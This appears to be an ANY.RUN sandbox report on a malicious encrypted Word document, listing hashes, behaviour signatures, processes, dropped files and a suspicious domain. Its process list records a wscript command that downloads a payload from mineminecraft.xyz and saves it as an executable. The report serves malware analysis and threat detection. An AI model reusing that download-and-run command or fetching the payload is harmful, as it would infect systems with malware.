analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Yevette_Juliet_987131.doc

Full analysis: https://app.any.run/tasks/5992d72f-752d-4164-ae33-2ac4a5018e23
Verdict: Malicious activity
Analysis date: February 21, 2020, 22:51:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
encrypted
Indicators:
MIME: application/encrypted
File info: CDFV2 Encrypted
MD5:

EA830AD32EC448F6D9BB6C7ECF8CB447

SHA1:

D3005A74A0CE3C0A015F88443619C2F6C46C8361

SHA256:

D871C6AB1A7AAAF5ED0826FE2564EC813AD582EE27A1F34AF53203895893FBF6

SSDEEP:

12288:srZxmRIRsw74kmYu3cwrD0Y+Snv0vuhW+UhZHve9s+:srmRohUkZuz1+vvuhWr3HAb

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3096)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3096)
  • SUSPICIOUS

    • Reads Internet Cache Settings

      • wscript.exe (PID: 1692)
      • wscript.exe (PID: 2316)
    • Executes scripts

      • cmd.exe (PID: 3720)
      • cmd.exe (PID: 2132)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3096)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3096)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
5
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs wscript.exe no specs cmd.exe no specs wscript.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3096"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\Yevette_Juliet_987131.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3720cmd /c ""C:\Colorfonts32\B4D9D02119.cmd" "C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1692wscript //nologo c:\Colorfonts32\visitcard.vbs http://mineminecraft.xyz/yifumejyzhasamydfglb/onbtn.bin c:\Colorfonts32\secpi15.exeC:\Windows\system32\wscript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2132cmd /c ""C:\Colorfonts32\B4D9D02119.cmd" "C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2316wscript //nologo c:\Colorfonts32\visitcard.vbs http://mineminecraft.xyz/yifumejyzhasamydfglb/onbtn.bin c:\Colorfonts32\secpi15.exeC:\Windows\system32\wscript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.8.7600.16385
Total events
2 197
Read events
1 126
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
73
Unknown types
5

Dropped files

PID
Process
Filename
Type
3096WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6039.tmp.cvr
MD5:
SHA256:
3096WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF02A4ECC92C07D0D3.TMP
MD5:
SHA256:
3096WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF30812A3A1DB8C363.TMP
MD5:
SHA256:
3096WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFB4E87714F4821071.TMP
MD5:
SHA256:
3096WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFA0129140167D228E.TMP
MD5:
SHA256:
3096WINWORD.EXEC:\Users\admin\AppData\Local\Temp\mso82D5.tmp
MD5:
SHA256:
3096WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFE62F6B92CA5DF6FE.TMP
MD5:
SHA256:
3096WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF85710F43E7E7A019.TMP
MD5:
SHA256:
3096WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\93CFC3F3.png
MD5:
SHA256:
3096WINWORD.EXEC:\Users\admin\Downloads\~$vette_Juliet_987131.docpgc
MD5:4D86C2114068D8C7C445C933DBC4B26E
SHA256:2845E80FCF1503BDEED1C25D5EBF768B8395402EFAB59DAD40E3398E6291BBD3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
mineminecraft.xyz
suspicious

Threats

No threats detected
No debug info